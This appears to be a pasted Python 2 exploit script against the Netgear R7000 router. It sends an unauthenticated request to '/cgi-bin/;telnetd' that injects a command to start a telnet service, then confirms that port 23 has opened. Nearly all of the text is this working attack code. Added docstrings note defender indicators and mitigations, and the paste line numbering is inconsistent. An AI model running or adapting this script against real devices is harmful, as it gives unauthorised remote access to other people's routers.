
Simple Netgear R7000 Command Injection Exploit

The_Defalt Dec 25th, 2016 467 Never
  1. #! /usr/bin/python
  2.  
  3. import socket
  4. import sys
  5. import requests
  6.  
  7. #This is a pretty simple exploit, not many modules needed!
  8.  
  9.  
# Exactly one positional argument is accepted: the address of the device
# to probe. Any other argument count prints the usage line and exits 1.
cli_args = sys.argv[1:]
if len(cli_args) != 1:
    print "usage: ./exploit [TARGET]"
    sys.exit(1)

# Module-level global read by checkVuln(), exploit() and verify().
# The value is used as given on the command line; it is not validated.
host = cli_args[0]
  15.  
def checkVuln():
    """Pre-flight port check against the global `host`.

    Attempts a TCP connect to port 80 and then to port 23. The check
    passes only when port 80 accepts the connection and port 23 does not;
    it then prints 'done'. Any other outcome, or any exception raised
    along the way, prints 'fail' and exits the process with status 1.

    NOTE(review): despite the name, nothing here tests for the injection
    flaw itself. Any host with HTTP reachable and telnet closed passes,
    so a pass is not evidence that a device is affected.
    NOTE(review): no socket timeout is set, and the sockets are not closed
    if connect_ex() raises before the close() calls are reached.
    """
    print 'checking host... ',
    sys.stdout.flush()
    try:
        http_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        http_status = http_sock.connect_ex((host, 80))
        telnet_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        telnet_status = telnet_sock.connect_ex((host, 23))
        http_sock.close()
        telnet_sock.close()
        # connect_ex() returns 0 on success; bail out unless the web port
        # is open and the telnet port is currently closed.
        if http_status != 0 or telnet_status == 0:
            raise Exception
        print 'done'
    except Exception:
        print 'fail'
        sys.exit(1)
  32.  
def exploit():
    """Issue one unauthenticated HTTP GET for '/cgi-bin/;telnetd' on `host`.

    The response is never inspected, and 'done' is printed whether the
    request returned or raised, so this function's output says nothing
    about the outcome; verify() is the only check that follows.

    Defender note: the request line carries a ';' immediately after
    '/cgi-bin/', a pattern that is simple to match in web or proxy logs
    or in an IDS rule. For the device named in the page title, the
    mitigations are the vendor's firmware update and keeping the
    management web interface off untrusted networks.
    """
    print 'attempting exploit... ',
    sys.stdout.flush()
    try:
        target_url = 'http://' + host + '/cgi-bin/;telnetd'
        requests.get(target_url)
        print 'done'
    except Exception:
        # Errors are deliberately not reported; the same message is printed.
        print 'done'
  40.  
def verify():
    """Check whether TCP port 23 on the global `host` now accepts connections.

    Prints 'success!' when connect_ex() returns 0. Any other result, or any
    exception, prints 'fail' and exits the process with status 1.

    NOTE(review): this only observes that the port is open; it does not
    confirm what is listening there.
    Defender note: a telnet port that starts listening on a router where
    it was previously closed is an indicator worth alerting on.
    """
    print 'verifying exploitation... ',
    sys.stdout.flush()
    try:
        probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        status = probe.connect_ex((host, 23))
        probe.close()
        if status != 0:
            raise Exception
        print 'success!'
    except Exception:
        print 'fail'
        sys.exit(1)
  54.  
# Run the three stages in order. checkVuln() and verify() call sys.exit(1)
# on failure, so a later stage runs only if the earlier one returned.
for stage in (checkVuln, exploit, verify):
    stage()